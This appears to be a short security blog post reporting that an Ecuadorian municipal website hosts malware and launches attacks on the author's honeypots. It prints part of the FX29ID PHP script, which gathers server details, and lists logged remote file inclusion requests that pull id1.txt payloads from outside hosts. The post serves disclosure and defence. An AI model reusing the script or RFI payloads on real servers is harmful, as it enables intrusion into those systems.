0 SHARES Facebook Twitter

Colombia, Venezuela and now Ecuador. How far are we from reporting the whole South America? 🙂

The web site from the ‘Municipio del Cantón Mejía’ in Ecuador has been hosting malware and also attacking our honeypots for a while. As always, we reported and didn’t hear anything back.

They are hosting the common FX29ID php exploit:

http://www.municipiodemejia.gov.ec/administrator/components/com_search/sken/id1(feelcomz).txt

< ? php

##[ Fxxxx ]##

fx(“ID”,”FeeL”.”CoMz”);

$P = @getcwd();

$IP = @getenv(“SERVER_ADDR”);

$UID = fx29exec(“id”);

fx(“SAFE”,@safemode()?”ON”:”OFF”);

fx(“OS”,@PHP_OS);

fx(“UNAME”,@php_uname());

fx(“SERVER”,($IP)?$IP:”-“);

fx(“USER”,@get_current_user());

fx(“UID”,($UID)?$UID:”uid=”.@getmyuid().” gid=”.@getmygid());

fx(“DIR”,$P);

fx(“PERM”,(@is_writable($P))?”[W]”:”[R]”);

fx(“HDD”,”Used: “.hdd(“used”).” Free: “.hdd(“free”).” Total: “.hdd(“total”));

fx(“DISFUNC”,@getdisfunc());

##[ FX29SHEXEC ]##

Also attempting RFI attacks against our systems (190.152.217.250 is their IP address):

SCAN:190.152.217.250 /xxx/new-visitor.inc.php?lvc_include_dir=http://www.j8design.com/id1.txt?

190.152.217.250 /xxx/show.php?path= http://kucing1.fileave.com/id1.txt?

190.152.217.250 //?_SERVER[DOCUMENT_ROOT]= http://clompunk.webs.com/id1.txt?

190.152.217.250 //bbs///skin/buzzard_espoon/setup.php?dir= http://www.hyonsvc.co.kr//bbs//icon/id1.txt????????

190.152.217.250 //delete_comment.php?board_skin_path= http://www.hyonsvc.co.kr//bbs//icon/id1.txt

If you know anyone at the Ecuador .gov, let them know about it. Hopefully they will get it fixed soon.